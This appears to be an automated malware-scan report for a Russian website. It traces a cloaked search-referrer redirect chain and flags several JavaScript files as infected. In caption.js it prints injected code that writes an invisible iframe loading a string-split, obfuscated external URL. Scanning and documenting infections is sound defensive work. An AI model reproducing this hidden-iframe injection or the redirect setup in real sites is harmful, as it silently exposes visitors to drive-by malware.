Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://energoaudittver.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: energoaudittver.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 13 May 2014 05:30:06 GMT Location: http://tinyurl.com/c2td3xs Server: nginx/1.4.1 Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
URL: http://tinyurl.com/c2td3xs (imitation of visitor from search engine) GET /c2td3xs HTTP/1.1 Host: tinyurl.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 13 May 2014 05:30:06 GMT Location: http://gaviatravel.com/includes/phpInputFilter/www/0.php Server: TinyURL/1.6 Content-Length: 0 Content-Type: text/html Set-Cookie: tinyUUID=371ade339e784e9e0be2978f; expires=Wed, 13-May-2015 05:30:06 GMT; path=/; domain=.tinyurl.com X-Powered-By: PHP/5.4.27 X-Tiny: cache 0.0099310874938965 | malicious |
Scanned pages/files
Request | Server response | Status |
http://energoaudittver.ru/ | 200 OK Content-Length: 24875 Content-Type: text/html | clean |
http://energoaudittver.ru/media/system/js/caption.js | 200 OK Content-Length: 11906 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.write('<iframe src="'+'ht'+'tp://'+'c'+'h'+'ops'+'h'+'op.eu/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');
Antivirus reports:
http://energoaudittver.ru/templates/network_1_6v3/jquery.js | 200 OK Content-Length: 81926 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o]
Antivirus reports:
http://energoaudittver.ru/templates/network_1_6v3/script.js | 200 OK Content-Length: 17772 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function() { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var u = navigator.userAgent.toLowerCase(); var is = function(t) { return (u.indexOf(t) != -1) }; jQuery('html').addClass([(!(/opera|webtv/i.test(u)) && /msie (\d)/.test(u)) ? ('ie
Antivirus reports:
http://energoaudittver.ru/index.php?option=com_content&view=article&id=54&Itemid=38 | 200 OK Content-Length: 17756 Content-Type: text/html | clean |
http://energoaudittver.ru/index.php?option=com_content&view=article&id=56&Itemid=40 | 200 OK Content-Length: 17647 Content-Type: text/html | clean |
http://energoaudittver.ru/index.php?option=com_content&view=article&id=55&Itemid=39 | 200 OK Content-Length: 16319 Content-Type: text/html | clean |
http://energoaudittver.ru/index.php?option=com_content&view=article&id=14&Itemid=6 | 200 OK Content-Length: 15767 Content-Type: text/html | clean |
http://api-maps.yandex.ru/1.1/?key=AN_DJk4BAAAAUXc7MgIAxFGuOmXtnGNYZevuosECN0ezwmkAAAAAAAAAAACqE4zSM_e6SG6ENvrveTkNChvEpg==&modules=pmap&wizard=constructor | 200 OK Content-Length: 5824 Content-Type: text/javascript | clean |
http://energoaudittver.ru/undefined/ | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://energoaudittver.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://energoaudittver.ru/documenti/fz01.doc | 200 OK Content-Length: 300838 Content-Type: application/msword | clean |
http://energoaudittver.ru/documenti/192010.doc | 200 OK Content-Length: 29696 Content-Type: application/msword | clean |
http://energoaudittver.ru/documenti/gorprog.doc | 200 OK Content-Length: 300836 Content-Type: application/msword | clean |
http://energoaudittver.ru/documenti/152010.doc | 200 OK Content-Length: 43008 Content-Type: application/msword | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=energoaudittver.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://energoaudittver.ru/
Result: energoaudittver.ru is not infected or malware details are not published yet.